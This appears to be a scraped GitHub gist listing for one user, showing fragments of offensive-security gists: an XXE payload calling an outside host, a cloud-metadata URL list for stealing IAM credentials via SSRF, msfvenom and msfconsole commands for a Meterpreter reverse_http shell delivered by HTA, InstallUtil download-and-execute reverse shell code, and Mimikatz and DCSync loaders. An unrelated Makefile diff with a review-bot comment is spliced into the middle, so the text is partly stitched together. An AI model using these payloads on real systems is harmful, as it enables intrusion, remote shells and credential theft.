@rkornmeyer
rkornmeyer / XXE_payloads
Created June 22, 2017 20:18 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
rkornmeyer / cloud_metadata.txt
Created June 7, 2017 17:59 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
diff --git a/Makefile.pre.in b/Makefile.pre.in
index bcd83bf..efbfd8d 100644
--- a/Makefile.pre.in
+++ b/Makefile.pre.in
@@ -461,6 +461,7 @@ sharedmods: $(BUILDPYTHON) pybuilddir.txt
esac; \
$(RUNSHARED) CC='$(CC)' LDSHARED='$(BLDSHARED)' OPT='$(OPT)' \
_TCLTK_INCLUDES='$(TCLTK_INCLUDES)' _TCLTK_LIBS='$(TCLTK_LIBS)' \
+ PYTHONXCPREFIX='$(DESTDIR)$(prefix)' \
$(PYTHON_FOR_BUILD) $(srcdir)/setup.py $$quiet build
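Review bot: the added PYTHONXCPREFIX='$(DESTDIR)$(prefix)' line in the sharedmods recipe has no comment or documentation saying what setup.py is expected to do with the variable, and nothing visible in this hunk defines or consumes it. Its value includes $(DESTDIR), which by convention is set only at install time, so during a plain build it collapses to $(prefix) and the build's behaviour depends on whether a staging root was exported. Please add a comment next to the assignment explaining the variable's purpose and state which value is intended when DESTDIR is empty.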
rkornmeyer / netkatz.cs
Created July 20, 2016 13:21
Downloads and Executes Mimikatz In Memory From GitHub
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
#!/usr/bin/env python
# Rulz.py
# Author: Nick Landers (@monoxgas) - Silent Break Security
import os
import sys
import argparse
import re
import binascii
import codecs
rkornmeyer / Example.hta
Created February 15, 2016 15:38
Shellcode Execution Via HTA
<html>
<!--
Example By Casey Smith @subTee
Generate Shellcode:
msfvenom --payload windows/meterpreter/reverse_http LHOST=192.168.56.103 LPORT=8080 --format vba > msf.vba
Wrap Shellcode in HTA
Deliver
Start Msf
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_http;set LPORT 8080;set LHOST 192.168.56.103;set ExitOnSession false; exploit -j"
Wait for Shells to Rain
rkornmeyer / pythonsms.py
Created January 22, 2016 20:21 — forked from alexle/pythonsms.py
How to send a text message with python
# sms.py
# Sends sms message to any cell phone using gmail smtp gateway
# Written by Alex Le
import smtplib
# Use sms gateway provided by mobile carrier:
# at&t: number@mms.att.net
# t-mobile: number@tmomail.net
# verizon: number@vtext.com
rkornmeyer / rev_http.cs
Created October 22, 2015 15:18
InstallUtil - Download And Execute Reverse_HTTP Payload
using System;
using System.Net;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:revshell.exe rev_http.cs
rkornmeyer / Invoke-DCSync.ps1
Created October 21, 2015 21:00 — forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
This file has been truncated, but you can view the full file.
function Get-NetUser {
<#
.SYNOPSIS
Query information for a given user or users in the domain.
.DESCRIPTION
This function uses [ADSI] and LDAP to query the current
domain for all users. Another domain can be specified to
query for users across a trust.
This is a replacement for "net users /domain"